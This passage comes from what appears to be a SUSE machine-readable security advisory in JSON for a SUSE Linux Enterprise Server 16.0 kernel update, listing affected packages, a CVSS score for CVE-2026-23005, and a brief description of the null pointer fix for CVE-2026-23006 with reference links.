"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
